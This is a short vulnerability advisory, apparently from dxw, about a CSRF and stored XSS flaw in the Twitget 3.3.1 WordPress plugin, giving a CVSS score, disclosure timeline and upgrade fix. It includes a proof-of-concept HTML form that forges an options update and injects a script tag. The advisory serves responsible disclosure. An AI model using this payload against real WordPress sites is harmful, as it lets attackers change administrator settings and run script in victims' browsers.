CSRF/XSS vulnerability in Twitget 3.3.1

Vulnerability

Last revised: March 18, 2014

If a logged-in administrator visits a specially crafted page, options can be updated (CSRF) without their consent, and some of those options are output unescaped into the form (XSS). In this example the XSS occurs at line 755 in twitget.php. The nonce-checking should have occurred somewhere around line 661 in the same file.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score	6.4 Medium
Vector	Network
Complexity	Low
Authentication	None
Confidentiality	Partial
Integrity	Partial
Availability	None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<form action="http://localhost/wp-admin/options-general.php?page=twitget/twitget.php" method="POST">
  <input type="text" name="twitget_username" value="john_smith">
  <input type="text" name="twitget_consumer_key" value="&quot;>&lt;script>alert('dxw')&lt;/script>">
  <input type="submit">
</form>

Advisory timeline

2013-07-30: Discovered
2014-03-18: Reported to plugins@wordpress.org
2014-04-09: Author reports fixed in version 3.3.3.

Mitigation/further actions

Upgrade to version 3.3.3 or later.

dxw advisories

Advisory: